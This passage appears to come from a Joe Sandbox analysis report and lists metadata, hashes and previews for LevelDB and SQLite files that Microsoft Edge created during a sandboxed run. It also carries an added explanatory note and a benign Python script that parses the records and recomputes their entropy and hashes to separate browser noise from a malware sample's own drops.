                                                                                                                                                            Entropy (8bit):5.216777187513372
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/gR1wkn23oH+TcwtnG2tbB2KLl9hJQ+q2Pwkn23oH+TcwtnG2tMsIFUv:7/g0fYebn9VFLzhC+vYfYebn9GFUv
                                                                                                                                                            MD5:6D04592F0BFC3679E7E746ED080749C2
                                                                                                                                                            SHA1:4B4513B1CDEC1DF6D2350D6FB64FEE3E24D8C685
                                                                                                                                                            SHA-256:BD0DEE27D44A6487302632C8139BB1AF9E82166D8B12903165A595975DC387F2
                                                                                                                                                            SHA-512:5E5C62CDFE23AC7DDB98066CEB0BE3E4DBF80CDB707FF6DE3F941A5B410416E5C271E62EB950D5B72BCED30F30297BB06FC5BF5EAA212462E89B3B81908E7B25
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:58.556 57c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db since it was missing..2025/01/06-17:04:58.596 57c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):41
                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:false
Preview:.|.."....leveldb.BytewiseComparator......

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 14, database pages 8, cookie 0xe, schema 4, UTF-8, version-valid-for 14
Category:dropped
Size (bytes):32768
Entropy (8bit):0.494709561094235
Encrypted:false
SSDEEP:24:TLEC30OIcqIn2o0FUFlA2cs0US5S693Xlej2:ThLaJUnAg0UB6I
MD5:CF7760533536E2AF66EA68BC3561B74D
SHA1:E991DE2EA8F42AE7E0A96A3B3B8AF87A689C8CCD
SHA-256:E1F183FAE5652BA52F5363A7E28BF62B53E7781314C9AB76B5708AF9918BE066
SHA-512:38B15FE7503F6DFF9D39BC74AA0150A7FF038029F973BE9A37456CDE6807BCBDEAB06E624331C8DFDABE95A5973B0EE26A391DB2587E614A37ADD50046470162
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:dropped
Size (bytes):20480
Entropy (8bit):0.6133660015301419
Encrypted:false
SSDEEP:12:TLW4QpRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWnSbTMAqXR:TLqpR+DDNzWjJ0npnyXKUO8+jtTpQkmL
MD5:980D2A4C8468F877395D58CD6E7ECDC5
SHA1:C55284B9FB98F3B5C83187C133B812D92DC77369
SHA-256:421298A237B2EAD77D2C357B94CE066657D19FC5A041C5554AC372B39C1EC97F
SHA-512:D48B2B40D4BA9DB23B6F74EACB3E59E5EECA8D82B1482884D9CE6BA4246CE176D4E930A407A607EA7FA38396012EE3FE01EE6C214E0C70FD010EBB3D5BE79889
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
SSDEEP:3:1sjgWIV//Uv:1qIFUv
MD5:46295CAC801E5D4857D09837238A6394
SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:false
Preview:MANIFEST-000001.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):375520
Entropy (8bit):5.35407033130931
Encrypted:false
SSDEEP:6144:1A/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:1FdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:47AC14FD972F907F2E49F737044CAECA
SHA1:76601932D3A676D693BA1AF08355F850F5CAF841
SHA-256:EA9D2BD7A19BFA06BCB214E634BACFDE435CC1A4F29A2EE47293FFCF1A501A58
SHA-512:CCE56ECEE22EC407E87C66E1E4545072425910D02F37502184D8C2749F42C02997727CAF0FCBCBAE28D8CDADBAA80B07BDF9C09B2108052C7E417FC5834739B6
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
SSDEEP:3:1sjgWIV//Uv:1qIFUv
MD5:46295CAC801E5D4857D09837238A6394
SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:false
Preview:MANIFEST-000001.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):309
Entropy (8bit):5.172446878030735
Encrypted:false
SSDEEP:6:iO/pr1Rq1wkn23oH+Tcwtk2WwnvB2KLl9pnq2Pwkn23oH+Tcwtk2WwnvIFUv:7/pr1bfYebkxwnvFLzpnvYfYebkxwnQg
MD5:82A8551922A658CE939E56A278BFB314
SHA1:4E81C125EF65CA707D25A3607A84A1FF57C1704E
SHA-256:B7E0DCF816B06754806B60CCD24C1890C759EC3919B1D3299E7421F92B1D1E0A
SHA-512:F21DA945687B22352721DD036D0EB8A0B391B4E1C1102D67962D2A9711E6F399B1EA9C35C740492B9913B8B07BA9528540C0D68474DABC1866435E942EEBC8F2
Malicious:false
Preview:2025/01/06-17:05:03.074 1c90 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/06-17:05:03.319 1c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:OpenPGP Secret Key
Category:dropped
Size (bytes):41
Entropy (8bit):4.704993772857998
Encrypted:false
SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:false
Preview:.|.."....leveldb.BytewiseComparator......

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:modified
Size (bytes):358860
Entropy (8bit):5.324606391263441
Encrypted:false
SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RC:C1gAg1zfvK
MD5:8D34BED33AFB2749F37D32B185EB2335
SHA1:64F3174B8BEC1984991A7DEE398A4895B423052E
SHA-256:984B0DCA2FBD3A05AC5557924A681DAA7B4094253A172111CAB78577D903679E
SHA-512:DD9D6AAF34457EDFBAB832E986D49B8A5939FE94EAB61F04E13F46376ABCDE473596DC569A14A0B3A533F4EE499DA7A56E2DE7CA1B27BFEBB0EFE767C438B17A
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
SSDEEP:3:1sjgWIV//Uv:1qIFUv
MD5:46295CAC801E5D4857D09837238A6394
SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:false
Preview:MANIFEST-000001.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):209
Entropy (8bit):1.8784775129881184
Encrypted:false
SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
MD5:478D49D9CCB25AC14589F834EA70FB9E
SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
SSDEEP:3:1sjgWIV//Uv:1qIFUv
MD5:46295CAC801E5D4857D09837238A6394
SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:false
Preview:MANIFEST-000001.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):279
Entropy (8bit):5.203643052050931
Encrypted:false
SSDEEP:6:iO/wmQB1wkn23oH+Tcwt8aVdg2KLl9lM+q2Pwkn23oH+Tcwt8aPrqIFUv:7/vfYeb0LzlM+vYfYebL3FUv
MD5:60D7035DE5E1D8F439AA4B61F81507E5
SHA1:E29B30234A5CD7FEDF19C9D918004D7AE778AA3E
SHA-256:340BEFD8CC0960A60C73C85993114B07DC87405732ED99B612FB17B2911EE7E3
                                                                                                                                                            SHA-512:BC3AB9D25DC8A89154B27BFA05675945F2B389330AF1F60B0E9A4F4FD1F485ACA95C93B145484E0B18ADB0CEED7FDA6FAB9A40C528703207780CBF9B655C2A55
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:58.395 7fc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules since it was missing..2025/01/06-17:04:58.418 7fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):41
                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):209
                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                            MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                            SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                            SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                            SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):283
                                                                                                                                                            Entropy (8bit):5.18527791886862
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/GSaFFB1wkn23oH+Tcwt86FB2KLl9dM+q2Pwkn23oH+Tcwt865IFUv:7/GofYeb/FFLzdM+vYfYeb/WFUv
                                                                                                                                                            MD5:47408AD3BD8BD5CE194DBAD23F5F3008
                                                                                                                                                            SHA1:84A053754BDE4A13F97FD41FF05601C278246A1C
                                                                                                                                                            SHA-256:E75A8CB0485D75D74182D3E11A28CEF078FAAF48C4EC12B89049C0E17EAA1908
                                                                                                                                                            SHA-512:16C7BC5043F3DD40B379426A976A94628D84BB0D0BAAADEFEE9B54EE2ADCEF07F02333B8A98293CE7EC8DDA61DEB40FA8705191197C56A8A9020CA0CBEFC8C6D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:58.423 7fc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts since it was missing..2025/01/06-17:04:58.436 7fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):41
                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1197
                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                            MD5:A2A3B1383E3AAC2430F44FC7BF3E447E
                                                                                                                                                            SHA1:B807210A1205126A107A5FE25F070D2879407AA4
                                                                                                                                                            SHA-256:90685D4E050DA5B6E6F7A42A1EE21264A68F1734FD3BD4A0E044BB53791020A2
                                                                                                                                                            SHA-512:396FAB9625A2FF396222DBC86A0E2CDE724C83F3130EE099F2872AED2F2F2ECE13B0853D635F589B70BD1B5E586C05A3231D68CAF9E46B6E2DAC105A10D0A1C8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):319
                                                                                                                                                            Entropy (8bit):5.248812371775563
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/w+Q+q2Pwkn23oH+Tcwt8NIFUtN/QgZmwz/QQVkwOwkn23oH+Tcwt8+eLJ:7/5vYfYebpFUtN/5/z/T5JfYebqJ
                                                                                                                                                            MD5:5C7A80FE5D46169DBB766047DED4BC18
                                                                                                                                                            SHA1:0847695B50F19A4ABBED013E932BC0950250F06D
                                                                                                                                                            SHA-256:8C262514E264D47AEC3131770658482BC0F904601F3F5F9806B7F422A43E7DFE
                                                                                                                                                            SHA-512:0A6873DE8C68A9AC04D11499199BFEF63CFD46871F325AD0A8E70A434A28030981F619925AD7720EC2C8CA98AF1D48948227107A73652CF9CEB29E5C5ED0C31C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:59.244 6b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/06-17:04:59.245 6b8 Recovering log #3.2025/01/06-17:04:59.245 6b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):319
                                                                                                                                                            Entropy (8bit):5.248812371775563
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/w+Q+q2Pwkn23oH+Tcwt8NIFUtN/QgZmwz/QQVkwOwkn23oH+Tcwt8+eLJ:7/5vYfYebpFUtN/5/z/T5JfYebqJ
                                                                                                                                                            MD5:5C7A80FE5D46169DBB766047DED4BC18
                                                                                                                                                            SHA1:0847695B50F19A4ABBED013E932BC0950250F06D
                                                                                                                                                            SHA-256:8C262514E264D47AEC3131770658482BC0F904601F3F5F9806B7F422A43E7DFE
                                                                                                                                                            SHA-512:0A6873DE8C68A9AC04D11499199BFEF63CFD46871F325AD0A8E70A434A28030981F619925AD7720EC2C8CA98AF1D48948227107A73652CF9CEB29E5C5ED0C31C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:59.244 6b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/06-17:04:59.245 6b8 Recovering log #3.2025/01/06-17:04:59.245 6b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
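Every record in this stretch was written by msedge.exe, not by w3245.exe: the MANIFEST-000001 / LevelDB log files and the "Creating DB ... since it was missing" lines are the browser initialising its own Extension Rules, Extension Scripts and Extension State stores, which is background noise the analyst has to filter out before the malware's own drops stand out. Two points are worth checking by hand. First, the 16-byte "MANIFEST-000001." file is a LevelDB CURRENT file, whose content is the manifest name plus a newline (the Preview prints the newline as a dot); recomputing 8-bit Shannon entropy over those 16 bytes reproduces the reported 3.2743974703476995 exactly, which confirms what the reported "Entropy (8bit)" measures. Second, the "OpenPGP Secret Key" file type on the 41-byte file is a libmagic misidentification of a LevelDB log record (the preview shows the leveldb.BytewiseComparator string), not key material. The following script is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling; SAMPLE_RECORDS is a constructed excerpt copied from the records above, and LEVELDB_CURRENT is the reconstructed file content just described.

```python
"""Parse Joe Sandbox 'Dropped Files' records and re-derive the report's entropy.

Added example; not part of the Joe Sandbox report. SAMPLE_RECORDS is a
constructed excerpt copied from the records above (field names and values
as they appear there). LEVELDB_CURRENT is reconstructed from the LevelDB
CURRENT file format, not taken from the page.
"""
import hashlib
import math
from collections import Counter

SAMPLE_RECORDS = """\
Process:C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
MD5:46295CAC801E5D4857D09837238A6394
SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
Malicious:false
Preview:MANIFEST-000001.
Process:C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
File Type:OpenPGP Secret Key
Category:dropped
Size (bytes):41
Entropy (8bit):4.704993772857998
Encrypted:false
MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
Malicious:false
Preview:.|.."....leveldb.BytewiseComparator......
"""

# Reconstructed content of the 16-byte file: a LevelDB CURRENT file holds the
# manifest name followed by a newline, which the report's Preview renders as '.'.
LEVELDB_CURRENT = b"MANIFEST-000001\n"


def parse_records(text):
    """Split the flat 'key:value' listing into one dict per dropped file.

    A new record starts at every 'Process:' line; lines before the first
    'Process:' (a record cut off by pagination) are skipped. Size, entropy
    and the two boolean flags are converted; other fields stay strings.
    """
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)
        if key == "Process":
            current = {}
            records.append(current)
        if current is None:
            continue
        if key == "Size (bytes)":
            current[key] = int(value)
        elif key == "Entropy (8bit)":
            current[key] = float(value)
        elif key in ("Encrypted", "Malicious"):
            current[key] = value.lower() == "true"
        else:
            current[key] = value
    return records


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the 'Entropy (8bit)' measure."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data):
    """MD5 / SHA1 / SHA-256 in the upper-case hex form the report uses."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
    }


def matches_record(data, record, tol=1e-9):
    """True if reconstructed content agrees with the record's size, entropy and hashes."""
    if len(data) != record["Size (bytes)"]:
        return False
    if abs(shannon_entropy(data) - record["Entropy (8bit)"]) > tol:
        return False
    computed = digests(data)
    return all(record[k] == computed[k] for k in computed if k in record)


def by_process(records):
    """Count dropped files per writing process (basename) so browser noise is visible at a glance."""
    counts = Counter()
    for r in records:
        counts[r["Process"].rsplit("\\", 1)[-1].lower()] += 1
    return dict(counts)


def suspicious(records):
    """Records worth a closer look: flagged Malicious, or marked Encrypted by the report."""
    return [r for r in records if r.get("Malicious") or r.get("Encrypted")]


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    print(by_process(recs))                        # {'msedge.exe': 2}
    print(shannon_entropy(LEVELDB_CURRENT))        # 3.274397470347699...
    print(matches_record(LEVELDB_CURRENT, recs[0]))
    print(len(suspicious(recs)))                   # 0
```

Run against the full "Dropped Files" table, by_process() separates the msedge.exe housekeeping files from anything written by w3245.exe or its children, and matches_record() lets you confirm a reconstructed file against the report's own size, entropy and hash fields before relying on it as an indicator.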

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 1, cookie 0x1, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):4096
Entropy (8bit):0.3169096321222068
Encrypted:false
SSDEEP:3:lSWbNFl/sl+ltl4ltllOl83/XWEEabIDWzdWuAzTgdWj3FtFIU:l9bNFlEs1ok8fDEPDadUTgd81Z
MD5:2554AD7847B0D04963FDAE908DB81074
SHA1:F84ABD8D05D7B0DFB693485614ECF5204989B74A
SHA-256:F6EF01E679B9096A7D8A0BD8151422543B51E65142119A9F3271F25F966E6C42
SHA-512:13009172518387D77A67BBF86719527077BE9534D90CB06E7F34E1CCE7C40B49A185D892EE859A8BAFB69D5EBB6D667831A0FAFBA28AC1F44570C8B68F8C90A4
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 8, cookie 0x8, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):32768
Entropy (8bit):0.40981274649195937
Encrypted:false
SSDEEP:24:TL1WK3iOvwxwwweePKmJIOAdQBVA/kjo/TJZwJ9OV3WOT/5eQQ:Tmm+/9ZW943WOT/
MD5:1A7F642FD4F71A656BE75B26B2D9ED79
SHA1:51BBF587FB0CCC2D726DDB95C96757CC2854CFAD
SHA-256:B96B6DDC10C29496069E16089DB0AB6911D7C13B82791868D583897C6D317977
                                                                                                                                                            SHA-512:FD14EADCF5F7AB271BE6D8EF682977D1A0B5199A142E4AB353614F2F96AE9B49A6F35A19CC237489F297141994A4A16B580F88FAC44486FCB22C05B2F1C3F7D1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):429
                                                                                                                                                            Entropy (8bit):5.809210454117189
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                            MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                            SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                            SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                            SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                            Malicious:false
